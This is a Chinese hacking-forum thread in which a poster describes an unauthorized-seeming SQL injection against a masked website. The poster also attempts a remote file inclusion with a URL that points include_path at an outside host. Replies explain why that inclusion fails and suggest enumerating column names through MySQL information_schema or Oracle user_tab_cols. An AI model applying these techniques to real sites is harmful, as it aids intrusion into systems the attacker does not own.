[讨论]一个php远程包含漏洞的问题?
议题作者:寂寞宝贝信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
今天检测一个站的时候,遇到这样一个问题,服务器应该是linux,绝对不是windows, 数据库是mysql,存在 php注入漏洞,被我猜到了管理员的存储信息表名,但字段名始终猜不到(就是管理员那个表),loadfile没反应,无赖之下猜到他后台的config.php文件,访问出现如下错误:
Warning: main(PATH_ROOT/config/config.php) [function.main]: failed to open stream: No such file or directory in /opt/www.xxxxx.cn/admin/inc/global.php on line 9
Fatal error: main() [function.require]: Failed opening required 'PATH_ROOT/config/config.php' (include_path='.:/usr/local/php5/lib/php') in /opt/www.xxxxx.cn/admin/inc/global.php on line 9
我看到这一句(include_path='.:/usr/local/php5/lib/php'),,貌似存在一个远程文件包含漏洞!不过我
[url]http://www.xxxx.cn/admin/inc/global.php?include_path=http://www.xxxx.com[/url]没反应,我对php不熟悉,问下各位牛淫,,mysql我猜不到字段名,有啥好的办法,loadfile用了没反应,远程包含为啥也没反应呢? 即便是他限制了后缀为php,,我也试过包含.php了!~ include_path不是变量吧,赋值给他是没用的 楼上的何解? 如果是$path=$_POST[path] 再用include($path)才是包含漏洞
直接用include("path.php") 这样path不存在时也会报错 PS:谢谢楼上各位,不过,,,,MYSQL猜不到字段,有啥好办法没? 我看到这一句(include_path='.:/usr/local/php5/lib/php'),,貌似存在一个远程文件包含漏洞!不过我
[url]http://www.xxxx.cn/admin/inc/global.php?include_path=http://www.xxxx.com[/url]没反应,我对php不熟悉,问下各位牛淫,,mysql我猜不到字段名,有啥好的办法,loadfile用了没反应,远程包含为啥也没反应呢?
这个也叫远程包含漏洞么?
猜不到字段,
oracle下是可以select * from user_tab_cols where table_name='表名'
mysql不知道有啥好办法没有, 如果是mysql5.0以上的话,可以尝试从information_schema库中获取信息。5.0以下似乎是没有办法的。mysql客户端工具中有个show tables和show columns from table_name,但是是以命令的形式出现的,而非函数。现在研究mysql,感觉里面应该会有获取表名和字段的函数。楼主可以查一下mysql的手册,说不定会有收获哦
还有那个include_path应该不是什么文件包含漏洞,有可能是什么库或者函数找不到的情况。/usr/local/php5是他的php安装目录,又不是网站的目录
页:
[1]